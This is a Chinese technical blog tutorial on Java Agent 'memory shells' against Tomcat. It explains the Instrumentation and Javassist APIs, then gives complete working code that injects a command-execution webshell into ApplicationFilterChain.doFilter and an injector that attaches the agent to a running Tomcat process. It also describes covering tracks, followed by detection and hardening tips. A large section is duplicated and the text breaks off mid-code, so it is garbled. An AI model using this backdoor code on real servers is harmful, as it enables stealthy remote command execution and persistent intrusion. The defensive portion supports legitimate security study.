Java Agent内存马技术详解<\/h1>

一、Java Agent基础概念<\/h2>

1.1 Java Agent介绍<\/h3>

Java Agent是Java提供的一种在不修改原始代码的前提下<\/strong>，对JVM中运行的类进行动态监控、增强或修改字节码<\/strong>的技术。它本质上是一个特殊的JAR包，通过JVM内置的Instrumentation API和钩子机制，在程序启动时（Premain）<\/strong>或运行时（Attach + Agentmain）<\/strong>介入类的加载与执行过程。<\/p>

核心能力：<\/strong><\/p>

在类被JVM加载前（或已加载后通过重转换），动态修改其字节码<\/li>
无需改动原有业务逻辑，即可插入监控、日志、安全检测或功能增强代码<\/li>
广泛应用于性能诊断（如Arthas）、APM监控（如SkyWalking）、代码覆盖率分析（如JaCoCo）、AOP编程、热部署等场景<\/li> <\/ul>
1.2 Java Agent工作原理<\/h3>
启动时机：<\/strong><\/p>

premain模式<\/strong>：在JVM启动时，主程序main方法执行前加载，通过-javaagent:agent.jar<\/code>参数指定<\/li>
agentmain模式<\/strong>：在JVM运行过程中动态加载（需配合Attach API），可实现对已运行程序的干预<\/li> <\/ul> 核心方法：<\/strong><\/p> premain(String agentArgs, Instrumentation inst)<\/code>：premain模式的入口<\/li> agentmain(String agentArgs, Instrumentation inst)<\/code>：agentmain模式的入口<\/li> Instrumentation接口<\/code>：提供类转换（addTransformer）、重新定义类（redefineClasses）等核心能力<\/li> <\/ul> 类转换流程：<\/strong> 当类被加载时，JVM会回调Agent中注册的ClassFileTransformer<\/code>接口的transform<\/code>方法，该方法可对类的字节码（byte[]）进行修改，返回修改后的字节码，JVM最终加载修改后的类。<\/p> 二、Java Agent两种加载方式详解<\/h2> 2.1 环境准备<\/h3> 创建基础测试项目结构：<\/p> \/\/ Fish.java <\/span><\/span><\/span><\/span>package<\/span> com.zifeiyu;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Fish<\/span> {<\/span> <\/span><\/span> public<\/span> void<\/span> swim<\/span>(){<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"鱼在水中游动"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ Main.java <\/span><\/span><\/span><\/span>package<\/span> com.zifeiyu;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> InterruptedException {<\/span> <\/span><\/span> Fish fish =<\/span> new<\/span> Fish();<\/span> <\/span><\/span> while<\/span>(<\/span>true<\/span>){<\/span> <\/span><\/span> fish.<\/span>swim<\/span>();<\/span> <\/span><\/span> Thread.<\/span>sleep<\/span>(<\/span>1000<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.2 启动时加载（premain）<\/h3> 实现步骤：<\/strong><\/p> Maven配置<\/strong>（pom.xml）：<\/li> <\/ol> <build><\/span> <\/span><\/span> <plugins><\/span> <\/span><\/span> <plugin><\/span> <\/span><\/span> <groupId><\/span>org.apache.maven.plugins<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>maven-assembly-plugin<\/artifactId><\/span> <\/span><\/span> <configuration><\/span> <\/span><\/span> <descriptorRefs><\/span> <\/span><\/span> <descriptorRef><\/span>jar-with-dependencies<\/descriptorRef><\/span> <\/span><\/span> <\/descriptorRefs><\/span> <\/span><\/span> <archive><\/span> <\/span><\/span> <manifestEntries><\/span> <\/span><\/span> <Premain-Class><\/span>PremainTest<\/Premain-Class><\/span> <\/span><\/span> <Can-Redefine-Classes><\/span>true<\/Can-Redefine-Classes><\/span> <\/span><\/span> <Can-Retransform-Classes><\/span>true<\/Can-Retransform-Classes><\/span> <\/span><\/span> <\/manifestEntries><\/span> <\/span><\/span> <\/archive><\/span> <\/span><\/span> <\/configuration><\/span> <\/span><\/span> <\/plugin><\/span> <\/span><\/span> <\/plugins><\/span> <\/span><\/span><\/build><\/span> <\/span><\/span><\/code><\/pre> Premain入口类<\/strong>：<\/li> <\/ol> import<\/span> java.lang.instrument.Instrumentation;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> PremainTest<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> premain<\/span>(<\/span>String agentArgs,<\/span> Instrumentation inst)<\/span> {<\/span> <\/span><\/span> inst.<\/span>addTransformer<\/span>(<\/span>new<\/span> AgentTransformer());<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 类转换器实现<\/strong>：<\/li> <\/ol> import<\/span> java.io.FileInputStream;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.ClassFileTransformer;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.IllegalClassFormatException;<\/span> <\/span><\/span>import<\/span> java.security.ProtectionDomain;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> AgentTransformer<\/span> implements<\/span> ClassFileTransformer {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> ProtectionDomain protectionDomain,<\/span> <\/span><\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> throws<\/span> IllegalClassFormatException {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"com\/zifeiyu\/Fish"<\/span>)){<\/span> <\/span><\/span> return<\/span> read(<\/span>"Fish.class"<\/span>);<\/span> \/\/ 替换为修改后的类文件 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> byte<\/span>[]<\/span> read<\/span>(<\/span>String path)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> FileInputStream in =<\/span> new<\/span> FileInputStream(<\/span>path);<\/span> <\/span><\/span> byte<\/span>[]<\/span> data =<\/span> new<\/span> byte<\/span>[<\/span>in.<\/span>available<\/span>()];<\/span> <\/span><\/span> in.<\/span>read<\/span>(<\/span>data);<\/span> <\/span><\/span> in.<\/span>close<\/span>();<\/span> <\/span><\/span> return<\/span> data;<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 运行方式<\/strong>：<\/li> <\/ol> java -javaagent:\/path\/to\/agent.jar -jar app.jar <\/span><\/span><\/code><\/pre>2.3 运行中动态加载（agentmain）<\/h3> 实现步骤：<\/strong><\/p> Maven配置增强<\/strong>：<\/li> <\/ol> <manifestEntries><\/span> <\/span><\/span> <Agent-Class><\/span>AgentMainTest<\/Agent-Class><\/span> <\/span><\/span> <Premain-Class><\/span>PremainTest<\/Premain-Class><\/span> <\/span><\/span> <Can-Redefine-Classes><\/span>true<\/Can-Redefine-Classes><\/span> <\/span><\/span> <Can-Retransform-Classes><\/span>true<\/Can-Retransform-Classes><\/span> <\/span><\/span><\/manifestEntries><\/span> <\/span><\/span> <\/span><\/span><dependency><\/span> <\/span><\/span> <groupId><\/span>com.sun<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>tools<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.8<\/version><\/span> <\/span><\/span> <scope><\/span>system<\/scope><\/span> <\/span><\/span> <systemPath><\/span>${java.home}\/..\/lib\/tools.jar<\/systemPath><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre> Agentmain入口类<\/strong>：<\/li> <\/ol> import<\/span> java.lang.instrument.Instrumentation;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.UnmodifiableClassException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> AgentMainTest<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> agentmain<\/span>(<\/span>String agentArgs,<\/span> Instrumentation inst)<\/span> {<\/span> <\/span><\/span> inst.<\/span>addTransformer<\/span>(<\/span>new<\/span> AgentTransformer(),<\/span> true<\/span>);<\/span> <\/span><\/span> for<\/span> (<\/span>Class<?><\/span> clazz :<\/span> inst.<\/span>getAllLoadedClasses<\/span>())<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>clazz.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"com.zifeiyu.Fish"<\/span>))<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> inst.<\/span>retransformClasses<\/span>(<\/span>clazz);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>UnmodifiableClassException e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 动态附加程序<\/strong>：<\/li> <\/ol> import<\/span> com.sun.tools.attach.VirtualMachine;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Attach<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> VirtualMachine vm =<\/span> VirtualMachine.<\/span>attach<\/span>(<\/span>"目标进程PID"<\/span>);<\/span> <\/span><\/span> vm.<\/span>loadAgent<\/span>(<\/span>"agent.jar路径"<\/span>);<\/span> <\/span><\/span> vm.<\/span>detach<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 获取进程PID<\/strong>：<\/li> <\/ol> jps -l # 查找目标进程ID<\/span> <\/span><\/span><\/code><\/pre>三、Javassist字节码操作库<\/h2> 3.1 核心组件<\/h3> 类名<\/th> 作用<\/th> <\/tr> <\/thead> ClassPool<\/td> 类的容器，默认包含JVM已加载的类路径<\/td> <\/tr> CtClass<\/td> 表示一个"可编辑"的Java类<\/td> <\/tr> CtMethod\/CtConstructor\/CtField<\/td> 分别表示方法、构造器、字段<\/td> <\/tr> ExprEditor<\/td> 高级编辑器，可遍历方法中的特定表达式<\/td> <\/tr> <\/tbody> <\/table> 3.2 简单示例<\/h3> import<\/span> javassist.*;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> JavassistDemo<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> CtClass cc =<\/span> pool.<\/span>get<\/span>(<\/span>"com.example.TargetClass"<\/span>);<\/span> <\/span><\/span> CtMethod method =<\/span> cc.<\/span>getDeclaredMethod<\/span>(<\/span>"sayHello"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> method.<\/span>insertBefore<\/span>(<\/span>"{ System.out.println(\"[Before] Entering sayHello\"); }"<\/span>);<\/span> <\/span><\/span> method.<\/span>insertAfter<\/span>(<\/span>"{ System.out.println(\"[After] Exiting sayHello\"); }"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> Class<?><\/span> clazz =<\/span> cc.<\/span>toClass<\/span>();<\/span> <\/span><\/span> Object obj =<\/span> clazz.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> clazz.<\/span>getMethod<\/span>(<\/span>"sayHello"<\/span>).<\/span>invoke<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 Maven依赖<\/h3> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.javassist<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javassist<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.29.2-GA<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>四、Agent内存马实现<\/h2> 4.1 攻击原理<\/h3> Agent内存马利用Java Agent的Attach机制，在目标JVM运行时动态注入恶意Agent JAR，通过Hook关键类实现持久化Webshell。<\/p> 选择目标类：org.apache.catalina.core.ApplicationFilterChain<\/strong><\/p> Tomcat中所有请求必经之路<\/li> 无需知道具体路由，全局入口<\/li> 兼容Tomcat 6~10<\/li> 在权限控制Filter之前执行<\/li> <\/ul> 4.2 恶意代码植入<\/h3> \/\/ 插入到ApplicationFilterChain.doFilter()方法的恶意代码 <\/span><\/span><\/span><\/span>String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span> <\/span><\/span>if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Process proc =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>InputStream<\/span> in =<\/span> proc.<\/span>getInputStream<\/span>();<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span> br =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span>(<\/span>new<\/span> java.<\/span>io<\/span>.<\/span>InputStreamReader<\/span>(<\/span>in));<\/span> <\/span><\/span> response.<\/span>setContentType<\/span>(<\/span>"text\/html"<\/span>);<\/span> <\/span><\/span> String line;<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>PrintWriter<\/span> out =<\/span> response.<\/span>getWriter<\/span>();<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> out.<\/span>println<\/span>(<\/span>line);<\/span> <\/span><\/span> out.<\/span>flush<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> out.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4.3 完整内存马实现<\/h3> AgentTransformer类：<\/strong><\/p> import<\/span> javassist.ClassPool;<\/span> <\/span><\/span>import<\/span> javassist.CtClass;<\/span> <\/span><\/span>import<\/span> javassist.CtMethod;<\/span> <\/span><\/span>import<\/span> javassist.LoaderClassPath;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.ClassFileTransformer;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.IllegalClassFormatException;<\/span> <\/span><\/span>import<\/span> java.security.ProtectionDomain;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> AgentTransformer<\/span> implements<\/span> ClassFileTransformer {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> ProtectionDomain protectionDomain,<\/span> <\/span><\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> throws<\/span> IllegalClassFormatException {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"org\/apache\/catalina\/core\/ApplicationFilterChain"<\/span>))<\/span> {<\/span> <\/span><\/span> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> pool.<\/span>appendClassPath<\/span>(<\/span>new<\/span> LoaderClassPath(<\/span>loader));<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> CtClass cc =<\/span> pool.<\/span>makeClass<\/span>(<\/span>new<\/span> ByteArrayInputStream(<\/span>classfileBuffer));<\/span> <\/span><\/span> CtMethod doFilter =<\/span> cc.<\/span>getDeclaredMethod<\/span>(<\/span>"doFilter"<\/span>);<\/span> <\/span><\/span> doFilter.<\/span>insertBefore<\/span>(<\/span>"{"<\/span> +<\/span> <\/span><\/span> "String cmd = request.getParameter(\"cmd\");\n"<\/span> +<\/span> <\/span><\/span> "if (cmd != null) {\n"<\/span> +<\/span> <\/span><\/span> " try {\n"<\/span> +<\/span> <\/span><\/span> " Process proc = Runtime.getRuntime().exec(cmd);\n"<\/span> +<\/span> <\/span><\/span> " java.io.InputStream in = proc.getInputStream();\n"<\/span> +<\/span> <\/span><\/span> " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in));\n"<\/span> +<\/span> <\/span><\/span> " response.setContentType(\"text\/html\");\n"<\/span> +<\/span> <\/span><\/span> " String line;\n"<\/span> +<\/span> <\/span><\/span> " java.io.PrintWriter out = response.getWriter();\n"<\/span> +<\/span> <\/span><\/span> " while ((line = br.readLine()) != null) {\n"<\/span> +<\/span> <\/span><\/span> " out.println(line);\n"<\/span> +<\/span> <\/span><\/span> " out.flush();\n"<\/span> +<\/span> <\/span><\/span> " }\n"<\/span> +<\/span> <\/span><\/span> " out.close();\n"<\/span> +<\/span> <\/span><\/span> " } catch (Exception e) {\n"<\/span> +<\/span> <\/span><\/span> " throw new RuntimeException(e);\n"<\/span> +<\/span> <\/span><\/span> " }\n"<\/span> +<\/span> <\/span><\/span> "}"<\/span> +<\/span> <\/span><\/span> "}"<\/span>);<\/span> <\/span><\/span> return<\/span> cc.<\/span>toBytecode<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>进程查找和注入：<\/strong><\/p> import<\/span> com.sun.tools.attach.VirtualMachine;<\/span> <\/span><\/span>import<\/span> java.io.BufferedReader;<\/span> <\/span><\/span>import<\/span> java.io.InputStreamReader;<\/span> <\/span><\/span>import<\/span> java.security.ProtectionDomain;<\/span> <\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Injector<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String pid =<\/span> getPID(<\/span>"org.apache.catalina.startup.Bootstrap"<\/span>);<\/span> <\/span><\/span> String jar =<\/span> getJar(<\/span>Injector.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> VirtualMachine vm =<\/span> VirtualMachine.<\/span>attach<\/span>(<\/span>pid);<\/span> <\/span><\/span> vm.<\/span>loadAgent<\/span>(<\/span>jar);<\/span> <\/span><\/span> vm.<\/span>detach<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> String getJar<\/span>(<\/span>Class<?><\/span> clazz)<\/span> {<\/span> <\/span><\/span> ProtectionDomain protectionDomain =<\/span> clazz.<\/span>getProtectionDomain<\/span>();<\/span> <\/span><\/span> URL location =<\/span> protectionDomain.<\/span>getCodeSource<\/span>().<\/span>getLocation<\/span>();<\/span> <\/span><\/span> String path =<\/span> location.<\/span>getPath<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> &&<\/span> path.<\/span>startsWith<\/span>(<\/span>"\/"<\/span>))<\/span> {<\/span> <\/span><\/span> path =<\/span> path.<\/span>substring<\/span>(<\/span>1<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> path;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> String getPID<\/span>(<\/span>String className)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"jps -l"<\/span>);<\/span> <\/span><\/span> BufferedReader reader =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>process.<\/span>getInputStream<\/span>()));<\/span> <\/span><\/span> String line;<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> reader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>line.<\/span>contains<\/span>(<\/span>className))<\/span> {<\/span> <\/span><\/span> return<\/span> line.<\/span>split<\/span>(<\/span>" "<\/span>)[<\/span>0<\/span>];<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4.4 实际攻击流程<\/h3> 获取目标进程PID<\/strong>：通过漏洞（如Spring Boot Actuator、JMX未授权访问）或系统命令执行获得<\/li> 上传恶意Agent JAR<\/strong>：利用文件上传漏洞或直接通过内存写入<\/li> 调用Attach API加载Agent<\/strong>：通过反射调用sun.tools.attach.VirtualMachineImpl<\/code><\/li> Agent执行字节码插桩<\/strong>：在关键类中插入后门逻辑<\/li> 清除痕迹<\/strong>：删除临时JAR文件，从内存中抹去Agent相关类引用<\/li> <\/ol> 五、检测与防御<\/h2> 5.1 检测手段<\/h3> 技术检测：<\/strong><\/p> 监控Attach行为<\/strong>：记录com.sun.tools.attach<\/code>相关调用<\/li> 检查Instrumentation实例<\/strong>：通过反射查看是否有非预期的ClassFileTransformer<\/code><\/li> 字节码完整性校验<\/strong>：对比关键类的当前字节码与原始JAR中是否一致<\/li> 安全产品监控<\/strong>：使用OpenRASP、青藤云、奇安信等支持Agent行为监控的产品<\/li> <\/ul> 检测代码示例：<\/strong><\/p> \/\/ 检查已注册的ClassFileTransformer <\/span><\/span><\/span><\/span>Instrumentation inst =<\/span> getInstrumentationInstance();<\/span> <\/span><\/span>for<\/span> (<\/span>ClassFileTransformer transformer :<\/span> inst.<\/span>getAllTransformers<\/span>())<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Transformer: "<\/span> +<\/span> transformer.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.2 防御建议<\/h3> 系统层面：<\/strong><\/p> 禁用Attach机制：-Djdk.attach.allowAttachSelf=false<\/code>、-XX:+DisableAttachMechanism<\/code><\/li> 最小权限原则：应用不要以root或高权限用户运行<\/li> 启用SecurityManager（旧系统）<\/li> <\/ul> 应用层面：<\/strong><\/p> 限制外部输入：防止反序列化、表达式注入等漏洞<\/li> 定期内存快照分析：使用MAT、JProfiler等工具排查异常类或Transformer<\/li> 代码审计：检查敏感类的字节码完整性<\/li> <\/ul> 运维层面：<\/strong><\/p> 网络隔离：限制不必要的网络访问<\/li> 进程监控：监控异常的JVM Attach操作<\/li> 安全更新：及时更新JDK和中间件版本<\/li> <\/ul> 六、总结<\/h2> Java Agent本身是合法且强大的开发工具，广泛应用于APM、调试等领域。Agent内存马是其被滥用于攻击的产物，代表了Java Web攻击技术的高级形态。<\/p> 技术特点：<\/strong><\/p> 高隐蔽性：恶意代码直接注入到合法类中<\/li> 持久化：存活于内存中，重启后消失<\/li> 绕过传统检测：不依赖Filter\/Servlet注册表<\/li> <\/ul> 防御关键：<\/strong><\/p> 纵深防御：结合漏洞治理 + 行为监控 + 运行时保护<\/li> 最小权限：严格控制JVM运行权限<\/li> 持续监控：建立完善的运行时安全监控体系<\/li> <\/ul> 通过深入理解Java Agent机制和内存马实现原理，才能有效防御这类高级攻击手段，保障Java应用安全。<\/p>

类名<\/th>	作用<\/th> <\/tr> <\/thead>
ClassPool<\/td>	类的容器，默认包含JVM已加载的类路径<\/td> <\/tr>
CtClass<\/td>	表示一个"可编辑"的Java类<\/td> <\/tr>
CtMethod\/CtConstructor\/CtField<\/td>	分别表示方法、构造器、字段<\/td> <\/tr>
ExprEditor<\/td>	高级编辑器，可遍历方法中的特定表达式<\/td> <\/tr> <\/tbody> <\/table> 3.2 简单示例<\/h3> import<\/span> javassist.*;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> JavassistDemo<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> CtClass cc =<\/span> pool.<\/span>get<\/span>(<\/span>"com.example.TargetClass"<\/span>);<\/span> <\/span><\/span> CtMethod method =<\/span> cc.<\/span>getDeclaredMethod<\/span>(<\/span>"sayHello"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> method.<\/span>insertBefore<\/span>(<\/span>"{ System.out.println(\"[Before] Entering sayHello\"); }"<\/span>);<\/span> <\/span><\/span> method.<\/span>insertAfter<\/span>(<\/span>"{ System.out.println(\"[After] Exiting sayHello\"); }"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> Class<?><\/span> clazz =<\/span> cc.<\/span>toClass<\/span>();<\/span> <\/span><\/span> Object obj =<\/span> clazz.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> clazz.<\/span>getMethod<\/span>(<\/span>"sayHello"<\/span>).<\/span>invoke<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 Maven依赖<\/h3> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.javassist<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javassist<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.29.2-GA<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>四、Agent内存马实现<\/h2> 4.1 攻击原理<\/h3> Agent内存马利用Java Agent的Attach机制，在目标JVM运行时动态注入恶意Agent JAR，通过Hook关键类实现持久化Webshell。<\/p> 选择目标类：org.apache.catalina.core.ApplicationFilterChain<\/strong><\/p> Tomcat中所有请求必经之路<\/li> 无需知道具体路由，全局入口<\/li> 兼容Tomcat 6~10<\/li> 在权限控制Filter之前执行<\/li> <\/ul> 4.2 恶意代码植入<\/h3> \/\/ 插入到ApplicationFilterChain.doFilter()方法的恶意代码 <\/span><\/span><\/span><\/span>String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span> <\/span><\/span>if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Process proc =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>InputStream<\/span> in =<\/span> proc.<\/span>getInputStream<\/span>();<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span> br =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span>(<\/span>new<\/span> java.<\/span>io<\/span>.<\/span>InputStreamReader<\/span>(<\/span>in));<\/span> <\/span><\/span> response.<\/span>setContentType<\/span>(<\/span>"text\/html"<\/span>);<\/span> <\/span><\/span> String line;<\/span> <\/span><\/span> java.<\/span>io<\/span>.<\/span>PrintWriter<\/span> out =<\/span> response.<\/span>getWriter<\/span>();<\/span> <\/span><\/span> while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> out.<\/span>println<\/span>(<\/span>line);<\/span> <\/span><\/span> out.<\/span>flush<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> out.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4.3 完整内存马实现<\/h3> AgentTransformer类：<\/strong><\/p> import<\/span> javassist.ClassPool;<\/span> <\/span><\/span>import<\/span> javassist.CtClass;<\/span> <\/span><\/span>import<\/span> javassist.CtMethod;<\/span> <\/span><\/span>import<\/span> javassist.LoaderClassPath;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.ClassFileTransformer;<\/span> <\/span><\/span>import<\/span> java.lang.instrument.IllegalClassFormatException;<\/span> <\/span><\/span>import<\/span> java.security.ProtectionDomain;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> AgentTransformer<\/span> implements<\/span> ClassFileTransformer {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> 